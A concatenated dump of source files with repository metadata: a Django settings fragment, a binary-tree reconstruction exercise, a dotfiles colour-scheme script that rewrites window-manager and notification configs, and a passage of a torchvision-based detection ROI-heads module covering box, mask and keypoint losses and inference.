# NOTE(review): presumably filled in per-deployment — confirm before relying
# on outgoing mail.
EMAIL_USE_TLS = True
EMAIL_HOST = ''
EMAIL_HOST_USER = ''
EMAIL_HOST_PASSWORD = ''
EMAIL_PORT = 587
STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder'
)
| [
"root.mohbe@gmail.com"
] | root.mohbe@gmail.com |
77c2ecaf8881dc69f7f28a6a102a52a772152728 | a2bb2cb991af985ec9444053e2c396d45dae5633 | /Tree questions/tree using inorder preorder.py | fabdefd5be990689fd3f67762c176b0561cddeb5 | [] | no_license | PauraviW/leetcode-problems | e8ad25ff3e565329065bc9907ebdcfbb81087865 | b309ec7304806c328b64ab47fa006b67c2e99307 | refs/heads/master | 2023-03-07T08:01:48.515155 | 2021-02-18T17:03:55 | 2021-02-18T17:03:55 | 265,299,036 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 929 | py | class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        # Binary-tree node: value payload plus optional left/right children.
        self.val = val
        self.left = left
        self.right = right
class Solution:
    """Rebuild a binary tree from its inorder and preorder traversals."""

    def constructTree(self, inorder, preorder):
        """Return the root TreeNode, or None for empty traversals.

        Node values must be unique (the inorder position of each value is
        used to split left/right subtrees), as in the original version.

        Improvement: the original re-scanned `inorder` with .index() and
        sliced new sublists at every recursion level (O(n^2) overall); here
        the inorder positions are precomputed once and the recursion works
        on index ranges, giving O(n).
        """
        position = {value: i for i, value in enumerate(inorder)}  # value -> inorder index
        preorder_iter = iter(preorder)

        def build(lo, hi):
            # Build the subtree whose values occupy inorder[lo:hi].
            if lo >= hi:
                return None
            val = next(preorder_iter, None)
            if val is None:  # preorder exhausted (mirrors the original guard)
                return None
            node = TreeNode(val)
            split = position[node.val]
            node.left = build(lo, split)        # values left of the root in inorder
            node.right = build(split + 1, hi)   # values right of the root
            return node

        return build(0, len(inorder))
# Demo: rebuild the sample tree, then print its values in BFS (level) order.
preorder = [3, 9, 20, 15, 7]
inorder = [9, 3, 15, 20, 7]
root = Solution().constructTree(inorder, preorder)
vals = []
queue = [root]
while queue:
    current, queue = queue[0], queue[1:]
    vals.append(current.val)
    # enqueue existing children left-to-right
    queue.extend(child for child in (current.left, current.right) if child)
print(vals)
| [
"pauravi.wagh12@gmail.com"
] | pauravi.wagh12@gmail.com |
35d70444c9801cd8678cf01c2f4f4dfb90bfa76a | 600aaed27fd7239db246e9ae1030f2fad8ee6015 | /.scripts/colour-manager.py | e9541c48947178353756ed1615725ce42cefc62f | [] | no_license | Hives/dotfiles-old | e89c97f53d454606db4e15b16e8b4916871dbf8c | 544d71c267a062db4778b85a9d46b38e975a05b2 | refs/heads/master | 2022-04-07T14:55:12.769628 | 2019-12-23T17:02:04 | 2019-12-23T17:02:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,595 | py | import os
import pprint
import subprocess
import sys
from pathlib import Path
from shutil import copyfile
# Colour scheme selection: first CLI argument if given, else the default
# dark scheme.  Scheme files live under ~/.config/xcolors/.
scheme = sys.argv[1] if len(sys.argv) > 1 else "dark-scheme"

home = str(Path.home()) + "/"
path = home + ".config/xcolors/"
schemefile = path + scheme
print('scheme file: ' + schemefile)
def update_config(path, name, output):
    """Replace everything between the two bear markers in path+name with `output`.

    The text between the "COLOURS START" and "COLOURS END" marker lines is
    swapped for `output` (both marker lines are kept).  The rewrite goes via
    a "-tmp" file which only replaces the original when the closing marker
    was actually found, so a config missing the end marker is left untouched.
    """
    config_file = path + name
    tmp_file = path + name + "-tmp"
    inside_markers = False
    found_end = False
    with open(config_file) as src, open(tmp_file, "w") as dst:
        for line in src:
            if inside_markers and "ʕっ•ᴥ•ʔっ COLOURS END" in line:
                inside_markers = False
                found_end = True
            if not inside_markers:
                dst.write(line)
                if "ʕっ•ᴥ•ʔっ COLOURS START" in line:
                    dst.write(output)
                    inside_markers = True
    # DANGER - COULD TRASH YOUR CONFIG HERE!!!!!!
    # Only swap the files when the end marker was found; otherwise something
    # has probably gone wrong and we would truncate the config.
    if found_end:
        os.remove(config_file)
        os.rename(tmp_file, config_file)
        print(name + " updated")
    else:
        os.remove(tmp_file)
        print("Couldn't find 'COLOURS END', did not modify " + name)
###############################################################################
## IMPORT COLOURS
###############################################################################
# Parse Xresources-style lines ("*.name: value") from the scheme file into a
# name -> hex-colour dict.  NOTE(review): the file handle from open() is
# never explicitly closed here.
colours = {}
for line in open(schemefile):
    line = ''.join(line.split()) # removes whitespace, space, tab etc.
    if len(line) > 1 and line[0]=="*":
        c = line.lower().split(':')
        name = c[0].lstrip("*.").rstrip(":")
        colours[name] = c[1]
# Semantic aliases for the raw palette entries.
# NOTE(review): background maps to color8 and background_bright to color0,
# the reverse of the usual normal/bright numbering — presumably deliberate
# for this scheme; confirm before "fixing".
foreground = colours["foreground"]
foreground_bright = colours["color14"]
highlight1 = colours["color5"]
highlight1_bright = colours["color13"]
highlight2 = colours["color4"]
highlight2_bright = colours["color12"]
background = colours["color8"]
background_bright = colours["color0"]
background_Vbright = colours["color10"]
urgent = colours["color1"]
urgent_bright = colours["color9"]
# standard colours
black = "#000000"
white = "#ffffff"
# Per-application colour roles, consumed by the sections below.
xmonadColours = {
    "cText": foreground,
    "cActive": highlight1,
    "cBackground": background,
    "cVisible": background_bright,
    "cDeselected": background_bright,
    "cVisibleWorkspaceText": foreground_bright,
    "cVisibleWorkspaceBackground": background_bright,
    "cUrgent": urgent,
    "cActiveTabText": background_bright,
    "cPrompt": background_bright,
    "cPromptHighlight": highlight2,
    "cHotPrompt": urgent,
    "cHotPromptText": background
}
rofiColours = {
    "normal-foreground": foreground,
    "normal-background": background,
    "normal-background-alternate": background_bright,
    "normal-selected-foreground": background,
    "normal-selected-background": highlight2,
    "active-foreground": background,
    "active-background": highlight1,
    "active-background-alternate": highlight1_bright,
    "urgent-foreground": background,
    "urgent-background": urgent,
    "urgent-background-alternate": urgent_bright,
    "border-color": highlight2
}
dunstColours = {
    "background": background,
    "foreground": foreground,
    "frame_low": highlight2,
    "frame_normal": highlight2,
    "frame_critical": urgent
}
dmenuColours = {
    "dmenu_fg": background,
    "dmenu_bg": highlight1,
    "dmenu_select_fg": highlight1,
    "dmenu_select_bg": background,
}
###############################################################################
## Dmenu
###############################################################################
# dmenu_output = '\n# %s\n\n' % schemefile
# for name, colour in dmenuColours.items():
# dmenu_output += '{name}="{colour}"\n'.format(name=name, colour=colour)
# dmenu_output += "\n"
# update_config( path = home + ".scripts/",
# name = "dmenu_pm",
# output = dmenu_output )
###############################################################################
## Dunst
###############################################################################
# Build the [urgency_*] sections for dunstrc; critical notifications never
# time out (timeout 0), the others disappear after 10 seconds.
dunst_output = '\n# %s/\n' % schemefile
dunst_output += '# shame we had to include the timeouts in here :(\n\n'
for urgency_level in ["low", "normal", "critical"]:
    timeout = "0" if urgency_level == "critical" else "10"
    dunst_output += '[urgency_%s]\n' % urgency_level
    dunst_output += ' frame_color = "%s"\n' % dunstColours["frame_" + urgency_level]
    dunst_output += ' background = "%s"\n' % dunstColours["background"]
    dunst_output += ' foreground = "%s"\n' % dunstColours["foreground"]
    dunst_output += ' timeout = "%s"\n' % timeout
    dunst_output += '\n'
update_config( path = home + ".config/dunst/",
               name = "dunstrc",
               output = dunst_output )
###############################################################################
## Rofi
###############################################################################
# Emit "name: colour;" rasi properties between the markers in config.rasi.
rofi_output = '\n/* %s */\n\n' % schemefile
for name, colour in rofiColours.items():
    rofi_output += '{name}: {colour};\n'.format(name=name, colour=colour)
rofi_output += "\n"
update_config( path = home + ".config/rofi/",
               name = "config.rasi",
               output = rofi_output )
###############################################################################
## XMonad
###############################################################################
# Emit Haskell bindings (name = "colour") between the markers in xmonad.hs.
xmonad_output = '\n-- %s\n\n' % schemefile
for name, colour in xmonadColours.items():
    xmonad_output += '{name} = "{colour}"\n'.format(name=name, colour=colour)
xmonad_output += "\n"
update_config( path = home + ".xmonad/",
               name = "xmonad.hs",
               output = xmonad_output )
###############################################################################
## XResources
###############################################################################
# Point ~/.Xresources at the chosen scheme file via an #include directive.
#copyfile(schemefile, path + 'xresources-current-scheme')
xresources_output = '#include "%s"\n' % schemefile
update_config( path = home,
               name = ".Xresources",
               output = xresources_output )
###############################################################################
## whats-playing
###############################################################################
# Inject the accent colour into the whats-playing script and keep it
# executable (the rewrite via a tmp file loses the mode bits).
whats_playing_output = 'colour=%s\n' % colours["color1"]
update_config( path = home + ".scripts/",
               name = "whats-playing",
               output = whats_playing_output )
subprocess.call(["chmod", "+x", home + ".scripts/whats-playing"])
###############################################################################
## Xmobar
###############################################################################
# this one is more complicated because the xmobar syntax is limited, and we
# can't just paste in a bunch of variable definitions.
# so instead we read through a template file and replace, for instance, "+red+"
# with the appropriate hex value.
# Note: this rebinds the module-level `path` and `name` used by the earlier
# sections.
path = home + ".xmonad/"
name = "xmobar.conf"
template_name = "xmobar-template.hs"
config_file = path + name
tmp_file = config_file + "-tmp"
template_file = path + template_name
xmobar_header_output = "--\n"
xmobar_header_output += "-- DO NOT EDIT THIS FILE DIRECTLY\n"
xmobar_header_output += "-- To make changes, edit %s\n" % template_file
xmobar_header_output += "-- then run colour-manager.py\n"
xmobar_header_output += "--\n"
# First pass: copy the template into the tmp file, replacing everything
# between the HEADER markers with the generated warning banner.
copying = True
header_ended = False
with open(template_file) as old_file, open(tmp_file, "w") as new_file:
    for line in old_file:
        if not copying and "ʕっ•ᴥ•ʔっ HEADER END" in line:
            copying = True
            header_ended = True
        if copying:
            new_file.write(line)
            if "ʕっ•ᴥ•ʔっ HEADER START" in line:
                new_file.write(xmobar_header_output)
                copying = False
# DANGER - COULD TRASH YOUR CONFIG HERE!!!!!!
# test if 'colours_ended' before copying file, should prove that the both
# markers were found
if header_ended:
    # Second pass: substitute each "+colour+" placeholder with its hex value.
    with open(tmp_file, 'r') as new_file:
        config_data = new_file.read()
    config_data = config_data.replace('+black+', colours["color0"])
    config_data = config_data.replace('+black_bright+', colours["color8"])
    config_data = config_data.replace('+red+', colours["color1"])
    # NOTE(review): every other "*_bright" placeholder maps to the bright
    # palette slot (color9-15), but red_bright maps to color1 — confirm
    # whether this should be colours["color9"].
    config_data = config_data.replace('+red_bright+', colours["color1"])
    config_data = config_data.replace('+green+', colours["color2"])
    config_data = config_data.replace('+green_bright+', colours["color10"])
    config_data = config_data.replace('+yellow+', colours["color3"])
    config_data = config_data.replace('+yellow_bright+', colours["color11"])
    config_data = config_data.replace('+blue+', colours["color4"])
    config_data = config_data.replace('+blue_bright+', colours["color12"])
    config_data = config_data.replace('+magenta+', colours["color5"])
    config_data = config_data.replace('+magenta_bright+', colours["color13"])
    config_data = config_data.replace('+cyan+', colours["color6"])
    config_data = config_data.replace('+cyan_bright+', colours["color14"])
    config_data = config_data.replace('+white+', colours["color7"])
    config_data = config_data.replace('+white_bright+', colours["color15"])
    # config_data = config_data.replace('+background+', black)
    config_data = config_data.replace('+background+', colours["color8"])
    config_data = config_data.replace('+foreground+', colours["foreground"])
    with open(tmp_file, 'w') as new_file:
        new_file.write(config_data)
    os.remove(config_file)
    os.rename(tmp_file, config_file)
    print(name + " updated")
else:
    os.remove(tmp_file)
    print("Couldn't find 'HEADER END', did not modify " + name)
| [
"communty.hivemind@gmail.com"
] | communty.hivemind@gmail.com |
2b92e1d8ee0232efdc6ea9429845fd92291d9e48 | dce6734caa0b2c60a8166a9c1020621dcaaa4079 | /src/roi_heads.py | 98e225ebacd3b5e111c7b68982162904f76e2fbe | [] | no_license | xiweiya/Thundernet-pytorch | 91be8b79edfc6da5623ea763b50f34041580171a | 0d62cd55430d5ce55560c1efc43d552b2d0b6671 | refs/heads/master | 2022-11-10T05:40:05.807907 | 2020-07-04T15:03:15 | 2020-07-04T15:03:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 32,303 | py | import torch
import torchvision
import torch.nn.functional as F
from torch import nn, Tensor
from torchvision.ops import boxes as box_ops
from torchvision.ops import misc as misc_nn_ops
from torchvision.ops import roi_align
#from . import _utils as det_utils
from torchvision.models.detection import _utils as det_utils
from torch.jit.annotations import Optional, List, Dict, Tuple
def fastrcnn_loss(class_logits, box_regression, labels, regression_targets):
    # type: (Tensor, Tensor, List[Tensor], List[Tensor])
    """
    Computes the Faster R-CNN classification and box-regression losses.

    Arguments:
        class_logits (Tensor): per-proposal class scores, shape (N, num_classes)
        box_regression (Tensor): per-proposal, per-class box deltas, shape (N, num_classes * 4)
        labels (list[Tensor]): per-image ground-truth class per proposal
        regression_targets (list[Tensor]): per-image regression targets per proposal

    Returns:
        classification_loss (Tensor)
        box_loss (Tensor)
    """
    all_labels = torch.cat(labels, dim=0)
    all_targets = torch.cat(regression_targets, dim=0)

    classification_loss = F.cross_entropy(class_logits, all_labels)

    # The box loss only covers proposals matched to a foreground class; each
    # positive proposal contributes the regression slot of its own label.
    pos_inds = torch.nonzero(all_labels > 0).squeeze(1)
    pos_labels = all_labels[pos_inds]

    n_proposals = class_logits.shape[0]
    per_class_regression = box_regression.reshape(n_proposals, -1, 4)

    # Summed smooth-L1 over positives, normalised by the total proposal count.
    box_loss = F.smooth_l1_loss(
        per_class_regression[pos_inds, pos_labels],
        all_targets[pos_inds],
        reduction="sum",
    ) / all_labels.numel()

    return classification_loss, box_loss
def maskrcnn_inference(x, labels):
    # type: (Tensor, List[Tensor])
    """
    Post-process mask logits: apply a sigmoid and keep, for each detection,
    only the mask channel of its predicted class.

    Arguments:
        x (Tensor): mask logits, shape (num_masks, num_classes, H, W)
        labels (list[Tensor]): predicted class per detection, one tensor
            per image

    Returns:
        list of per-image mask-probability tensors of shape (n_i, 1, H, W)
    """
    probs = x.sigmoid()

    # remember per-image detection counts so we can split at the end
    detections_per_image = [len(l) for l in labels]
    flat_labels = torch.cat(labels)

    mask_index = torch.arange(x.shape[0], device=flat_labels.device)
    selected = probs[mask_index, flat_labels][:, None]

    if len(detections_per_image) == 1:
        # TODO : remove when dynamic split supported in ONNX
        return [selected]
    return selected.split(detections_per_image, dim=0)
def project_masks_on_boxes(gt_masks, boxes, matched_idxs, M):
    # type: (Tensor, Tensor, Tensor, int)
    """
    Given segmentation masks and the bounding boxes corresponding
    to the location of the masks in the image, this function
    crops and resizes the masks in the position defined by the
    boxes. This prepares the masks for them to be fed to the
    loss computation as the targets.

    Returns an (num_boxes, M, M) tensor of cropped/resized masks.
    """
    # match dtype/device of the boxes before building roi_align inputs
    matched_idxs = matched_idxs.to(boxes)
    # roi_align expects rois as (batch_index, x1, y1, x2, y2); here the
    # "batch index" is the matched ground-truth mask index
    rois = torch.cat([matched_idxs[:, None], boxes], dim=1)
    # add a channel dimension and match dtype/device of the rois
    gt_masks = gt_masks[:, None].to(rois)
    # crop to M x M at scale 1.0, then drop the channel dimension
    return roi_align(gt_masks, rois, (M, M), 1.)[:, 0]
def maskrcnn_loss(mask_logits, proposals, gt_masks, gt_labels, mask_matched_idxs):
    # type: (Tensor, List[Tensor], List[Tensor], List[Tensor], List[Tensor])
    """
    Computes the Mask R-CNN mask loss.

    Arguments:
        mask_logits (Tensor): predicted mask logits, one channel per class
        proposals (list[Tensor]): per-image proposal boxes
        gt_masks (list[Tensor]): per-image ground-truth masks
        gt_labels (list[Tensor]): per-image ground-truth labels
        mask_matched_idxs (list[Tensor]): per-image index of the matched
            ground truth for each proposal

    Return:
        mask_loss (Tensor): scalar tensor containing the loss
    """
    # targets are rendered at the same resolution as the predicted masks
    discretization_size = mask_logits.shape[-1]
    labels = [l[idxs] for l, idxs in zip(gt_labels, mask_matched_idxs)]
    # crop/resize each matched gt mask into its proposal box
    mask_targets = [
        project_masks_on_boxes(m, p, i, discretization_size)
        for m, p, i in zip(gt_masks, proposals, mask_matched_idxs)
    ]
    labels = torch.cat(labels, dim=0)
    mask_targets = torch.cat(mask_targets, dim=0)
    # torch.mean (in binary_cross_entropy_with_logits) doesn't
    # accept empty tensors, so handle it separately
    if mask_targets.numel() == 0:
        return mask_logits.sum() * 0
    # only the channel of the ground-truth class enters the loss
    mask_loss = F.binary_cross_entropy_with_logits(
        mask_logits[torch.arange(labels.shape[0], device=labels.device), labels], mask_targets
    )
    return mask_loss
def keypoints_to_heatmap(keypoints, rois, heatmap_size):
    # type: (Tensor, Tensor, int)
    """
    Quantize keypoint coordinates into heatmap cells.

    Each keypoint (x, y) of shape (num_rois, K, 3) is rescaled from its roi
    into a heatmap_size x heatmap_size grid and flattened to a linear index.
    Returns (heatmaps, valid): linear cell index per keypoint (zeroed for
    invalid ones) and a 0/1 flag for keypoints that are both visible
    (third coordinate > 0) and inside the grid.
    """
    roi_x0 = rois[:, 0][:, None]
    roi_y0 = rois[:, 1][:, None]
    scale_x = (heatmap_size / (rois[:, 2] - rois[:, 0]))[:, None]
    scale_y = (heatmap_size / (rois[:, 3] - rois[:, 1]))[:, None]

    kp_x = keypoints[..., 0]
    kp_y = keypoints[..., 1]

    # Points exactly on the right/bottom roi edge would floor to one cell
    # outside the grid; remember them now and clamp to the last cell below.
    on_right_edge = kp_x == rois[:, 2][:, None]
    on_bottom_edge = kp_y == rois[:, 3][:, None]

    x = ((kp_x - roi_x0) * scale_x).floor().long()
    y = ((kp_y - roi_y0) * scale_y).floor().long()
    x[on_right_edge] = torch.tensor(heatmap_size - 1)
    y[on_bottom_edge] = torch.tensor(heatmap_size - 1)

    inside = (x >= 0) & (y >= 0) & (x < heatmap_size) & (y < heatmap_size)
    visible = keypoints[..., 2] > 0
    valid = (inside & visible).long()

    heatmaps = (y * heatmap_size + x) * valid
    return heatmaps, valid
def _onnx_heatmaps_to_keypoints(maps, maps_i, roi_map_width, roi_map_height,
                                widths_i, heights_i, offset_x_i, offset_y_i):
    # ONNX-traceable counterpart of the per-roi body of heatmaps_to_keypoints:
    # everything stays in tensor ops so the graph can be exported.
    num_keypoints = torch.scalar_tensor(maps.size(1), dtype=torch.int64)
    width_correction = widths_i / roi_map_width
    height_correction = heights_i / roi_map_height
    # upsample this roi's heatmaps to the roi's (rounded-up) pixel size
    roi_map = torch.nn.functional.interpolate(
        maps_i[None], size=(int(roi_map_height), int(roi_map_width)), mode='bicubic', align_corners=False)[0]
    w = torch.scalar_tensor(roi_map.size(2), dtype=torch.int64)
    # argmax over the flattened map gives the peak cell per keypoint
    pos = roi_map.reshape(num_keypoints, -1).argmax(dim=1)
    x_int = (pos % w)
    y_int = ((pos - x_int) / w)
    # cell centre (d + 0.5) scaled back to image coordinates
    x = (torch.tensor(0.5, dtype=torch.float32) + x_int.to(dtype=torch.float32)) * \
        width_correction.to(dtype=torch.float32)
    y = (torch.tensor(0.5, dtype=torch.float32) + y_int.to(dtype=torch.float32)) * \
        height_correction.to(dtype=torch.float32)
    xy_preds_i_0 = x + offset_x_i.to(dtype=torch.float32)
    xy_preds_i_1 = y + offset_y_i.to(dtype=torch.float32)
    # third row is a constant visibility flag of 1
    xy_preds_i_2 = torch.ones((xy_preds_i_1.shape), dtype=torch.float32)
    xy_preds_i = torch.stack([xy_preds_i_0.to(dtype=torch.float32),
                              xy_preds_i_1.to(dtype=torch.float32),
                              xy_preds_i_2.to(dtype=torch.float32)], 0)
    # TODO: simplify when indexing without rank will be supported by ONNX
    end_scores_i = roi_map.index_select(1, y_int.to(dtype=torch.int64)) \
        .index_select(2, x_int.to(dtype=torch.int64))[:num_keypoints, 0, 0]
    return xy_preds_i, end_scores_i
@torch.jit.script
def _onnx_heatmaps_to_keypoints_loop(maps, rois, widths_ceil, heights_ceil,
                                     widths, heights, offset_x, offset_y, num_keypoints):
    # Scripted loop over rois for ONNX export: accumulates the per-roi
    # results of _onnx_heatmaps_to_keypoints via torch.cat (no Python lists,
    # so the loop stays representable in the exported graph).
    xy_preds = torch.zeros((0, 3, int(num_keypoints)), dtype=torch.float32, device=maps.device)
    end_scores = torch.zeros((0, int(num_keypoints)), dtype=torch.float32, device=maps.device)
    for i in range(int(rois.size(0))):
        xy_preds_i, end_scores_i = _onnx_heatmaps_to_keypoints(maps, maps[i],
                                                               widths_ceil[i], heights_ceil[i],
                                                               widths[i], heights[i],
                                                               offset_x[i], offset_y[i])
        xy_preds = torch.cat((xy_preds.to(dtype=torch.float32),
                              xy_preds_i.unsqueeze(0).to(dtype=torch.float32)), 0)
        end_scores = torch.cat((end_scores.to(dtype=torch.float32),
                                end_scores_i.to(dtype=torch.float32).unsqueeze(0)), 0)
    return xy_preds, end_scores
def heatmaps_to_keypoints(maps, rois):
    """Extract predicted keypoint locations from heatmaps.

    Returns a tuple (xy_preds, end_scores): xy_preds has shape
    (#rois, #keypoints, 3) holding (x, y, 1) per keypoint, and end_scores has
    shape (#rois, #keypoints) holding the heatmap value at each predicted
    location.
    """
    # This function converts a discrete image coordinate in a HEATMAP_SIZE x
    # HEATMAP_SIZE image to a continuous keypoint coordinate. We maintain
    # consistency with keypoints_to_heatmap_labels by using the conversion from
    # Heckbert 1990: c = d + 0.5, where d is a discrete coordinate and c is a
    # continuous coordinate.
    offset_x = rois[:, 0]
    offset_y = rois[:, 1]
    widths = rois[:, 2] - rois[:, 0]
    heights = rois[:, 3] - rois[:, 1]
    widths = widths.clamp(min=1)
    heights = heights.clamp(min=1)
    widths_ceil = widths.ceil()
    heights_ceil = heights.ceil()
    num_keypoints = maps.shape[1]
    # ONNX export path: same computation expressed entirely in traced tensor ops
    if torchvision._is_tracing():
        xy_preds, end_scores = _onnx_heatmaps_to_keypoints_loop(maps, rois,
                                                                widths_ceil, heights_ceil, widths, heights,
                                                                offset_x, offset_y,
                                                                torch.scalar_tensor(num_keypoints, dtype=torch.int64))
        return xy_preds.permute(0, 2, 1), end_scores
    xy_preds = torch.zeros((len(rois), 3, num_keypoints), dtype=torch.float32, device=maps.device)
    end_scores = torch.zeros((len(rois), num_keypoints), dtype=torch.float32, device=maps.device)
    for i in range(len(rois)):
        roi_map_width = int(widths_ceil[i].item())
        roi_map_height = int(heights_ceil[i].item())
        width_correction = widths[i] / roi_map_width
        height_correction = heights[i] / roi_map_height
        # upsample this roi's heatmaps to the roi's pixel size
        roi_map = torch.nn.functional.interpolate(
            maps[i][None], size=(roi_map_height, roi_map_width), mode='bicubic', align_corners=False)[0]
        # roi_map_probs = scores_to_probs(roi_map.copy())
        w = roi_map.shape[2]
        # peak cell per keypoint over the flattened map
        pos = roi_map.reshape(num_keypoints, -1).argmax(dim=1)
        x_int = pos % w
        y_int = (pos - x_int) // w
        # assert (roi_map_probs[k, y_int, x_int] ==
        #         roi_map_probs[k, :, :].max())
        # cell centre (d + 0.5) mapped back into image coordinates
        x = (x_int.float() + 0.5) * width_correction
        y = (y_int.float() + 0.5) * height_correction
        xy_preds[i, 0, :] = x + offset_x[i]
        xy_preds[i, 1, :] = y + offset_y[i]
        xy_preds[i, 2, :] = 1
        end_scores[i, :] = roi_map[torch.arange(num_keypoints), y_int, x_int]
    return xy_preds.permute(0, 2, 1), end_scores
def keypointrcnn_loss(keypoint_logits, proposals, gt_keypoints, keypoint_matched_idxs):
    # type: (Tensor, List[Tensor], List[Tensor], List[Tensor])
    """
    Computes the Keypoint R-CNN loss: cross entropy over the flattened
    (H*W) heatmap of each valid keypoint, with the quantized ground-truth
    cell index as the target class.
    """
    N, K, H, W = keypoint_logits.shape
    assert H == W
    discretization_size = H
    heatmaps = []
    valid = []
    # quantize the matched ground-truth keypoints into heatmap cells, per image
    for proposals_per_image, gt_kp_in_image, midx in zip(proposals, gt_keypoints, keypoint_matched_idxs):
        kp = gt_kp_in_image[midx]
        heatmaps_per_image, valid_per_image = keypoints_to_heatmap(
            kp, proposals_per_image, discretization_size
        )
        heatmaps.append(heatmaps_per_image.view(-1))
        valid.append(valid_per_image.view(-1))
    keypoint_targets = torch.cat(heatmaps, dim=0)
    valid = torch.cat(valid, dim=0).to(dtype=torch.uint8)
    # indices of keypoints that are visible and inside their heatmap
    valid = torch.nonzero(valid).squeeze(1)
    # torch.mean (in binary_cross_entropy_with_logits) doesn't
    # accept empty tensors, so handle it separately
    if keypoint_targets.numel() == 0 or len(valid) == 0:
        return keypoint_logits.sum() * 0
    keypoint_logits = keypoint_logits.view(N * K, H * W)
    keypoint_loss = F.cross_entropy(keypoint_logits[valid], keypoint_targets[valid])
    return keypoint_loss
def keypointrcnn_inference(x, boxes):
    # type: (Tensor, List[Tensor])
    """
    Convert predicted keypoint heatmaps into per-image keypoint coordinates
    and scores via heatmaps_to_keypoints.

    Returns (kp_probs, kp_scores), each a list with one tensor per image.
    """
    kp_probs = []
    kp_scores = []
    boxes_per_image = [box.size(0) for box in boxes]
    if len(boxes_per_image) == 1:
        # TODO : remove when dynamic split supported in ONNX
        kp_prob, scores = heatmaps_to_keypoints(x, boxes[0])
        return [kp_prob], [scores]
    # split the batched heatmaps back into per-image chunks
    x2 = x.split(boxes_per_image, dim=0)
    for xx, bb in zip(x2, boxes):
        kp_prob, scores = heatmaps_to_keypoints(xx, bb)
        kp_probs.append(kp_prob)
        kp_scores.append(scores)
    return kp_probs, kp_scores
def _onnx_expand_boxes(boxes, scale):
    # type: (Tensor, float)
    # ONNX-traceable version of expand_boxes: scales each (x1, y1, x2, y2)
    # box about its centre by `scale`, building the result with torch.stack
    # instead of in-place assignment.
    w_half = (boxes[:, 2] - boxes[:, 0]) * .5
    h_half = (boxes[:, 3] - boxes[:, 1]) * .5
    x_c = (boxes[:, 2] + boxes[:, 0]) * .5
    y_c = (boxes[:, 3] + boxes[:, 1]) * .5
    w_half = w_half.to(dtype=torch.float32) * scale
    h_half = h_half.to(dtype=torch.float32) * scale
    boxes_exp0 = x_c - w_half
    boxes_exp1 = y_c - h_half
    boxes_exp2 = x_c + w_half
    boxes_exp3 = y_c + h_half
    boxes_exp = torch.stack((boxes_exp0, boxes_exp1, boxes_exp2, boxes_exp3), 1)
    return boxes_exp
# the next two functions should be merged inside Masker
# but are kept here for the moment while we need them
# temporarily for paste_mask_in_image
def expand_boxes(boxes, scale):
    # type: (Tensor, float)
    # Scale each (x1, y1, x2, y2) box about its centre by `scale`; delegates
    # to the tensor-only variant when tracing for ONNX export.
    if torchvision._is_tracing():
        return _onnx_expand_boxes(boxes, scale)
    w_half = (boxes[:, 2] - boxes[:, 0]) * .5
    h_half = (boxes[:, 3] - boxes[:, 1]) * .5
    x_c = (boxes[:, 2] + boxes[:, 0]) * .5
    y_c = (boxes[:, 3] + boxes[:, 1]) * .5
    w_half *= scale
    h_half *= scale
    boxes_exp = torch.zeros_like(boxes)
    boxes_exp[:, 0] = x_c - w_half
    boxes_exp[:, 2] = x_c + w_half
    boxes_exp[:, 1] = y_c - h_half
    boxes_exp[:, 3] = y_c + h_half
    return boxes_exp
@torch.jit.unused
def expand_masks_tracing_scale(M, padding):
    # type: (int, int) -> float
    # Tracing-only helper: computes (M + 2*padding) / M as a tensor op so the
    # scale stays in the traced graph (eager code uses plain float division).
    return torch.tensor(M + 2 * padding).to(torch.float32) / torch.tensor(M).to(torch.float32)
def expand_masks(mask, padding):
    # type: (Tensor, int)
    """
    Zero-pad masks by `padding` on all four sides.

    Returns (padded_mask, scale) where scale is the ratio of the padded
    width to the original width of the last dimension.
    """
    mask_width = mask.shape[-1]
    if torch._C._get_tracing_state():  # could not import is_tracing(), not sure why
        # keep the scale as a traced tensor op during ONNX export
        scale = expand_masks_tracing_scale(mask_width, padding)
    else:
        scale = float(mask_width + 2 * padding) / mask_width
    padded = torch.nn.functional.pad(mask, (padding,) * 4)
    return padded, scale
def paste_mask_in_image(mask, box, im_h, im_w):
    # type: (Tensor, Tensor, int, int)
    # Resize a fixed-size mask to its box and paste it into a zeroed
    # (im_h, im_w) canvas, clipping the box to the image bounds.
    TO_REMOVE = 1
    # box width/height in integer pixels (inclusive coordinates), at least 1
    w = int(box[2] - box[0] + TO_REMOVE)
    h = int(box[3] - box[1] + TO_REMOVE)
    w = max(w, 1)
    h = max(h, 1)
    # Set shape to [batchxCxHxW]
    mask = mask.expand((1, 1, -1, -1))
    # Resize mask
    mask = misc_nn_ops.interpolate(mask, size=(h, w), mode='bilinear', align_corners=False)
    mask = mask[0][0]
    im_mask = torch.zeros((im_h, im_w), dtype=mask.dtype, device=mask.device)
    # clip the paste region to the image
    x_0 = max(box[0], 0)
    x_1 = min(box[2] + 1, im_w)
    y_0 = max(box[1], 0)
    y_1 = min(box[3] + 1, im_h)
    # copy the corresponding (possibly clipped) slice of the resized mask
    im_mask[y_0:y_1, x_0:x_1] = mask[
        (y_0 - box[1]):(y_1 - box[1]), (x_0 - box[0]):(x_1 - box[0])
    ]
    return im_mask
def _onnx_paste_mask_in_image(mask, box, im_h, im_w):
    """ONNX-exportable variant of paste_mask_in_image.

    Uses tensor ops only (no Python int conversion except for interpolate's
    size) and emulates dynamic padding with explicit zero-tensor concatenation.
    """
    one = torch.ones(1, dtype=torch.int64)
    zero = torch.zeros(1, dtype=torch.int64)

    # Box extents, clamped to at least 1 pixel.
    w = (box[2] - box[0] + one)
    h = (box[3] - box[1] + one)
    w = torch.max(torch.cat((w, one)))
    h = torch.max(torch.cat((h, one)))

    # Set shape to [batchxCxHxW]
    mask = mask.expand((1, 1, mask.size(0), mask.size(1)))

    # Resize mask
    mask = torch.nn.functional.interpolate(mask, size=(int(h), int(w)), mode='bilinear', align_corners=False)
    mask = mask[0][0]

    # Paste region clipped to the image bounds.
    x_0 = torch.max(torch.cat((box[0].unsqueeze(0), zero)))
    x_1 = torch.min(torch.cat((box[2].unsqueeze(0) + one, im_w.unsqueeze(0))))
    y_0 = torch.max(torch.cat((box[1].unsqueeze(0), zero)))
    y_1 = torch.min(torch.cat((box[3].unsqueeze(0) + one, im_h.unsqueeze(0))))

    unpaded_im_mask = mask[(y_0 - box[1]):(y_1 - box[1]),
